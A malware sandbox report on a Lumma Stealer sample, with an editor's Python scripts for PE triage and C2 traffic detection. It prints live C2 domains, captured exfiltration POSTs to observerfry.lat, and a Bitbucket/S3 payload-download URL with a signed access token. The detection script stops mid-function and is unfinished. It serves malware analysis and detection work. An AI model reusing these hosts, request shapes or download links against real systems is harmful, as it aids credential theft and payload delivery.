
Windows Analysis Report
Yh6fS6qfTE.exe

Overview

General Information

Sample name: Yh6fS6qfTE.exe (renamed because the original name is a hash value)
Original sample name: 6cb8e80fe23740dff137816a6572a5ba.exe
Analysis ID: 1579720
MD5: 6cb8e80fe23740dff137816a6572a5ba
SHA1: 446866ccfa51b2e7f8d37d6d703ed660ba408df0
SHA256: 74d4a3a971e9d7cb7e2a9f3b3c01e7936075aa5c975ee83e54881f53ecff3379
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
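Several of the static signatures above (entry point outside the standard sections, a section name with special characters, an invalid PE checksum, 32-bit PE, section rights changed at unpack time) can be re-derived from the PE headers alone. The following Python is an added example by the editor and is not part of the Joe Sandbox report; because the page does not carry the sample's bytes, it runs against a constructed minimal PE32 whose section names, RVAs and RWX flag on the second section are assumptions chosen to trigger the same checks. The checksum routine is the standard imagehlp word-sum algorithm. A zero or stale checksum on its own is a weak signal (unsigned and packed builds routinely ship without one); the entry point sitting in a writable, oddly named section is the stronger of the two.

```python
import struct

# Section names a stock linker emits; an entry point anywhere else is worth a look.
STANDARD_SECTIONS = frozenset({".text", ".code", ".data", ".rdata", ".idata", ".edata",
                               ".rsrc", ".reloc", ".bss", ".tls", ".pdata", ".CRT"})
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x80000000


def parse_pe(data: bytes) -> dict:
    """Read the few header fields the triage needs (works for PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    fh = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20                                       # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]      # 0x10B = PE32, 0x20B = PE32+
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    checksum_off = opt + 64                             # same offset in PE32 and PE32+
    sections = []
    for i in range(nsections):
        raw_name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + i * 40)
        name = raw_name.rstrip(b"\0")
        sections.append({"name": name.decode("latin-1"), "va": va, "vsize": vsize,
                         "rawsize": rawsize, "rawptr": rawptr, "chars": chars,
                         "special_chars": any(b < 0x20 or b > 0x7E for b in name)})
    return {"magic": magic, "entry_rva": entry_rva, "checksum_off": checksum_off,
            "checksum": struct.unpack_from("<I", data, checksum_off)[0], "sections": sections}


def pe_checksum(data: bytes, checksum_off: int) -> int:
    """Recompute the optional-header CheckSum as imagehlp's CheckSumMappedFile does:
    sum all 32-bit words except the CheckSum field with end-around carry, fold to
    16 bits, then add the file length."""
    if checksum_off % 4:
        raise ValueError("CheckSum field is not dword-aligned")
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_off:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def section_for_rva(sections: list, rva: int):
    return next((s for s in sections
                 if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"])), None)


def triage(data: bytes) -> dict:
    """Static checks mirroring the report's PE signatures."""
    pe = parse_pe(data)
    ep = section_for_rva(pe["sections"], pe["entry_rva"])
    computed = pe_checksum(data, pe["checksum_off"])
    rwx = bool(ep) and (ep["chars"] & IMAGE_SCN_MEM_WRITE) and (ep["chars"] & IMAGE_SCN_MEM_EXECUTE)
    return {
        "is_32bit": pe["magic"] == 0x10B,
        "entry_section": ep["name"] if ep else None,
        "entry_outside_standard_sections": ep is None or ep["name"] not in STANDARD_SECTIONS,
        "entry_section_rwx": bool(rwx),           # self-modifying / unpacker entry stub
        "nonstandard_section_names": [s["name"] for s in pe["sections"]
                                      if s["name"] not in STANDARD_SECTIONS],
        "section_names_with_special_chars": [s["name"] for s in pe["sections"] if s["special_chars"]],
        "header_checksum": pe["checksum"],
        "computed_checksum": computed,
        # zero means "never set"; a non-zero mismatch means the file changed after linking
        "checksum_valid": pe["checksum"] != 0 and pe["checksum"] == computed,
    }


def fix_checksum(data: bytes) -> bytes:
    """Write a correct CheckSum back, the way a linker or signing tool would."""
    pe = parse_pe(data)
    out = bytearray(data)
    struct.pack_into("<I", out, pe["checksum_off"], pe_checksum(data, pe["checksum_off"]))
    return bytes(out)


def build_sample_pe(entry_rva: int = 0x2000, checksum: int = 0) -> bytes:
    """Constructed stand-in, not the analysed sample: a minimal PE32 with a normal
    .text section and an RWX section whose name carries a control character."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                     # e_lfanew = 0x40
    file_header = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x0102)  # i386, 2 sections, EXE|32BIT
    optional = struct.pack(
        "<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
        0x10B, 14, 0, 0x200, 0x200, 0, entry_rva, 0x1000, 0x2000, 0x400000, 0x1000, 0x200,
        6, 0, 0, 0, 6, 0, 0, 0x3000, 0x200, checksum, 2, 0x8140,
        0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128           # 16 empty data directories

    def section(name, va, rawptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, 0x200, va, 0x200, rawptr, 0, 0, 0, 0, chars)

    headers = (dos + b"PE\0\0" + file_header + optional
               + section(b".text", 0x1000, 0x200, 0x60000020)             # CODE|EXECUTE|READ
               + section(b".\x01xyz", 0x2000, 0x400, 0xE0000020)          # CODE|EXECUTE|READ|WRITE
               ).ljust(0x200, b"\0")
    return headers + b"\xC3".ljust(0x200, b"\0") + (bytes(range(256)) * 2)


if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print(f"{key}: {value!r}")
```

Run as a script it prints the triage of the constructed file; to use it on a real sample, pass `open(path, "rb").read()` to `triage()`. The same parser is what you would extend to dump section rights for the "changes PE section rights" finding, which needs a memory snapshot after unpacking rather than the file on disk.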

Classification

  • System is w10x64
  • Yh6fS6qfTE.exe (PID: 7200 cmdline: "C:\Users\user\Desktop\Yh6fS6qfTE.exe" MD5: 6CB8E80FE23740DFF137816A6572A5BA)
    • WerFault.exe (PID: 7704 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7200 -s 1928 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["curverpluch.lat", "shapestickyr.lat", "slipperyloo.lat", "wordyfindy.lat", "observerfry.lat", "talkynicer.lat", "tentabatte.lat", "manyrestro.lat", "bashfulacid.lat"], "Build id": "LOGS11--LiveTraffic"}
Source                                          Rule                           Description                       Author
sslproxydump.pcap                               JoeSecurity_LummaCStealer_3    Yara detected LummaC Stealer      Joe Security
sslproxydump.pcap                               JoeSecurity_LummaCStealer_2    Yara detected LummaC Stealer      Joe Security
Process Memory Space: Yh6fS6qfTE.exe PID: 7200  JoeSecurity_LummaCStealer_3    Yara detected LummaC Stealer      Joe Security
Process Memory Space: Yh6fS6qfTE.exe PID: 7200  JoeSecurity_CredentialStealer  Yara detected Credential Stealer  Joe Security
Process Memory Space: Yh6fS6qfTE.exe PID: 7200  JoeSecurity_LummaCStealer_2    Yara detected LummaC Stealer      Joe Security
Process Memory Space: Yh6fS6qfTE.exe PID: 7200  JoeSecurity_LummaCStealer      Yara detected LummaC Stealer      Joe Security
decrypted.memstr                                JoeSecurity_LummaCStealer_2    Yara detected LummaC Stealer      Joe Security
No Sigma rule has matched

Timestamp                        SID      Severity  Classtype                                      Source IP     Src Port  Destination IP  Dst Port  Protocol
2024-12-23T08:04:10.172670+0100  2028371  3         Unknown Traffic                                192.168.2.10  49701     104.21.36.201   443       TCP
2024-12-23T08:04:12.163814+0100  2028371  3         Unknown Traffic                                192.168.2.10  49703     104.21.36.201   443       TCP
2024-12-23T08:04:14.529127+0100  2028371  3         Unknown Traffic                                192.168.2.10  49709     104.21.36.201   443       TCP
2024-12-23T08:04:17.228213+0100  2028371  3         Unknown Traffic                                192.168.2.10  49715     104.21.36.201   443       TCP
2024-12-23T08:04:19.631552+0100  2028371  3         Unknown Traffic                                192.168.2.10  49721     104.21.36.201   443       TCP
2024-12-23T08:04:22.674668+0100  2028371  3         Unknown Traffic                                192.168.2.10  49732     104.21.36.201   443       TCP
2024-12-23T08:04:25.482375+0100  2028371  3         Unknown Traffic                                192.168.2.10  49740     104.21.36.201   443       TCP
2024-12-23T08:04:30.676889+0100  2028371  3         Unknown Traffic                                192.168.2.10  49752     104.21.36.201   443       TCP
2024-12-23T08:04:32.985383+0100  2028371  3         Unknown Traffic                                192.168.2.10  49758     185.166.143.50  443       TCP
2024-12-23T08:04:35.384918+0100  2028371  3         Unknown Traffic                                192.168.2.10  49764     52.217.18.140   443       TCP
2024-12-23T08:04:10.937958+0100  2054653  1         A Network Trojan was detected                  192.168.2.10  49701     104.21.36.201   443       TCP
2024-12-23T08:04:12.934573+0100  2054653  1         A Network Trojan was detected                  192.168.2.10  49703     104.21.36.201   443       TCP
2024-12-23T08:04:31.455213+0100  2054653  1         A Network Trojan was detected                  192.168.2.10  49752     104.21.36.201   443       TCP
2024-12-23T08:04:10.937958+0100  2049836  1         A Network Trojan was detected                  192.168.2.10  49701     104.21.36.201   443       TCP
2024-12-23T08:04:12.934573+0100  2049812  1         A Network Trojan was detected                  192.168.2.10  49703     104.21.36.201   443       TCP
2024-12-23T08:04:23.467326+0100  2048094  1         Malware Command and Control Activity Detected  192.168.2.10  49732     104.21.36.201   443       TCP

AV Detection

Source: Yh6fS6qfTE.exe | Avira: detected
Source: Yh6fS6qfTE.exe.7200.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["curverpluch.lat", "shapestickyr.lat", "slipperyloo.lat", "wordyfindy.lat", "observerfry.lat", "talkynicer.lat", "tentabatte.lat", "manyrestro.lat", "bashfulacid.lat"], "Build id": "LOGS11--LiveTraffic"}
Source: Yh6fS6qfTE.exe | ReversingLabs: Detection: 60%
Source: Yh6fS6qfTE.exe | Virustotal: Detection: 56%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Yh6fS6qfTE.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String decryptor: bashfulacid.lat
Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String decryptor: tentabatte.lat
Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String decryptor: curverpluch.lat
Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String decryptor: talkynicer.lat
Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String decryptor: shapestickyr.lat
Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String decryptor: manyrestro.lat
Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String decryptor: slipperyloo.lat
Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String decryptor: wordyfindy.lat
Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String decryptor: observerfry.lat
Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String decryptor: LOGS11--LiveTraffic
Source: Yh6fS6qfTE.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49703 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.10:49758 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.217.18.140:443 -> 192.168.2.10:49764 version: TLS 1.2
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Directory queried: number of queries: 1001

                Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49701 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49732 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49703 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49752 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49703 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49701 -> 104.21.36.201:443
Source: Malware configuration extractor | URLs: curverpluch.lat
Source: Malware configuration extractor | URLs: shapestickyr.lat
Source: Malware configuration extractor | URLs: slipperyloo.lat
Source: Malware configuration extractor | URLs: wordyfindy.lat
Source: Malware configuration extractor | URLs: observerfry.lat
Source: Malware configuration extractor | URLs: talkynicer.lat
Source: Malware configuration extractor | URLs: tentabatte.lat
Source: Malware configuration extractor | URLs: manyrestro.lat
Source: Malware configuration extractor | URLs: bashfulacid.lat
Source: Joe Sandbox View | IP Address: 185.166.143.50
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49721 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49715 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49703 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49701 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49709 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49740 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49758 -> 185.166.143.50:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49764 -> 52.217.18.140:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49752 -> 104.21.36.201:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49732 -> 104.21.36.201:443
Note: JA3 a0e9f5d64349fb13191bc781f81f42e1 is commonly produced by the native Windows TLS stack (Schannel, as used through WinINet/WinHTTP) and is shared by many legitimate programs; the severity-3 alert name is historical, and the hash corroborates the other alerts rather than identifying Lumma on its own. It also fires here on the Bitbucket (185.166.143.50) and S3 (52.217.18.140) sessions, which are the payload download, not C2.
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 53
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=0EJN6A3PZ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12799
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=QP80O4MCUY78Z
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15050
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=AOLLEKSDMMCQNPI9
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20430
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=NREVLCRG
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1211
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=7U9NNJRY0XWPO12
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 571438
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 88
    Host: observerfry.lat
Source: global traffic | HTTP traffic detected:
    GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: bitbucket.org
Source: global traffic | HTTP traffic detected:
    GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNNRVK3O6C&Signature=bByUD0dwbg83H%2B08dW7zc8pOm%2Bg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAcaCXVzLWVhc3QtMSJGMEQCIC%2B3%2BjjbUGy0cjpzRRt6zZkEP8eYcNsEXxJyxzBfB3lyAiBIwHqx1SbPwC93UpRITG%2FtrJmfMbZ%2FMXMhi%2BrpeiLhTSqwAgjQ%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMr97ZQWydwtjVD%2FpUKoQCHlbL64aNAUs4s7esfnGXOd9hXvgq4lUh%2FQ0cD%2FYV5YaiDhEKUfk%2B7GlLTWJfer66qWqqXLx8kitt6%2FA4KK5y64dXWwliu0m0tn1smPd2eoWfQIpk9bYGZwtZB5Scx2vR942g3DzN%2Fvdodbo3w6cqKqQy2ODgJOCBPHZ9P1ANP6B%2BNTBekl2XQwIqFwe7DJSORVZm7%2BEwOihmeCtNTLNto5dobnF5VOueL3lrsMTg7mCaNjr9mVsieDw%2FsO3a%2Fxh3Dx8zzj57LdQ%2FRCMdgUookY1HthLgxHwTapScSAJbiw0Tz0v3em5jIi5Jfz4z0KsfJ9sVcTEzP9i1MdEYNBll3KE8eNIw7ZCkuwY6ngGd2muSZEx%2BEhQWHxRfS%2FkoWFVkYiveDA%2FCxx59WBWRi1RllYutEaisKs85SZO4fX2JcmoM7yMSgbDsoQ0cWoQJiuLny%2BOgtUxL0Kt2wR5hwGCVrIifmHynfYsW0MUKSiDkWMfo%2FjPuC275RdIKqyvbvnR64DRMAhp0z5MhZstWCaV8QT4IUjNY5%2BNgVba3urSkJnOCqY4fkw0LSEnp5g%3D%3D&Expires=1734938485 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: bbuseruploads.s3.amazonaws.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (three occurrences)
Source: global traffic | DNS traffic detected: DNS query: observerfry.lat
Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: observerfry.lat
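The HTTP entries above show the shape of this build's C2 conversation: a run of POST /api requests to a single .lat host from the configuration, the first ones form-encoded and only a few bytes long, then multipart/form-data bodies between roughly 1 KB and 560 KB (the collected data), and afterwards a GET of FormattingCharitable.exe from Bitbucket and its S3 backend, which is the loader behaviour described in the Malpedia entry. The following Python is an added example by the editor and is not part of the Joe Sandbox report. It runs the three checks a detection engineer would derive from those entries over a constructed proxy log: hosts, paths, content types and content lengths are taken from the report, while the timestamps, the shortened S3 query string, the log format, the 128-byte check-in threshold and the second, benign client 192.168.2.11 are assumptions. It deliberately keys on request shape rather than user agent: the decrypted string TeslaBrowser/5.5 sits in memory, but on the wire this sample used a stock Chrome 119 user agent, so a rule that only looks for TeslaBrowser misses it.

```python
import shlex
from collections import defaultdict

# C2 domains from the LummaC configuration extracted in this report.
LUMMA_C2_DOMAINS = frozenset({
    "curverpluch.lat", "shapestickyr.lat", "slipperyloo.lat", "wordyfindy.lat", "observerfry.lat",
    "talkynicer.lat", "tentabatte.lat", "manyrestro.lat", "bashfulacid.lat",
})
# User agent the sample actually sent; the decrypted "TeslaBrowser/5.5" string never hit the wire.
UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
FORM, MP = "application/x-www-form-urlencoded", "multipart/form-data; boundary="

# Constructed proxy log (not captured from the sandbox). Format per line:
#   <timestamp> <client> <method> <host> <path> "<content-type>" <content-length> "<user-agent>"
# Hosts, paths, content types and lengths follow the report's HTTP entries; the timestamps,
# the shortened S3 query string and the second client 192.168.2.11 (benign control) are made up.
SAMPLE_LOG = [
    f'2024-12-23T08:04:10+0100 192.168.2.10 POST observerfry.lat /api "{FORM}" 8 "{UA}"',
    f'2024-12-23T08:04:12+0100 192.168.2.10 POST observerfry.lat /api "{FORM}" 53 "{UA}"',
    f'2024-12-23T08:04:17+0100 192.168.2.10 POST observerfry.lat /api "{MP}0EJN6A3PZ" 12799 "{UA}"',
    f'2024-12-23T08:04:19+0100 192.168.2.10 POST observerfry.lat /api "{MP}QP80O4MCUY78Z" 15050 "{UA}"',
    f'2024-12-23T08:04:22+0100 192.168.2.10 POST observerfry.lat /api "{MP}AOLLEKSDMMCQNPI9" 20430 "{UA}"',
    f'2024-12-23T08:04:25+0100 192.168.2.10 POST observerfry.lat /api "{MP}NREVLCRG" 1211 "{UA}"',
    f'2024-12-23T08:04:30+0100 192.168.2.10 POST observerfry.lat /api "{MP}7U9NNJRY0XWPO12" 571438 "{UA}"',
    f'2024-12-23T08:04:31+0100 192.168.2.10 POST observerfry.lat /api "{FORM}" 88 "{UA}"',
    f'2024-12-23T08:04:33+0100 192.168.2.10 GET bitbucket.org /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe "-" 0 "{UA}"',
    f'2024-12-23T08:04:35+0100 192.168.2.10 GET bbuseruploads.s3.amazonaws.com /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment "-" 0 "{UA}"',
    f'2024-12-23T08:05:00+0100 192.168.2.11 POST login.example.com /api "{FORM}" 64 "{UA}"',
    f'2024-12-23T08:05:02+0100 192.168.2.11 POST login.example.com /api "{FORM}" 64 "{UA}"',
    f'2024-12-23T08:05:09+0100 192.168.2.11 GET downloads.example.com /tools/setup.exe "-" 0 "{UA}"',
]


def parse_line(line: str) -> dict:
    ts, src, method, host, path, ctype, length, ua = shlex.split(line)
    return {"ts": ts, "src": src, "method": method, "host": host, "path": path,
            "ctype": ctype, "length": int(length), "ua": ua}


def analyse(lines, c2_domains=LUMMA_C2_DOMAINS, max_checkin_bytes=128) -> list:
    """Three layers: exact C2 match from the extracted config, the check-in-then-upload
    shape of the /api traffic (catches builds whose domains are not yet known), and the
    follow-on executable fetch that Lumma's loader feature produces."""
    events = [parse_line(line) for line in lines]
    by_pair = defaultdict(list)
    for e in events:
        by_pair[(e["src"], e["host"])].append(e)
    findings, exfil_sources = [], set()
    for (src, host), evs in sorted(by_pair.items()):
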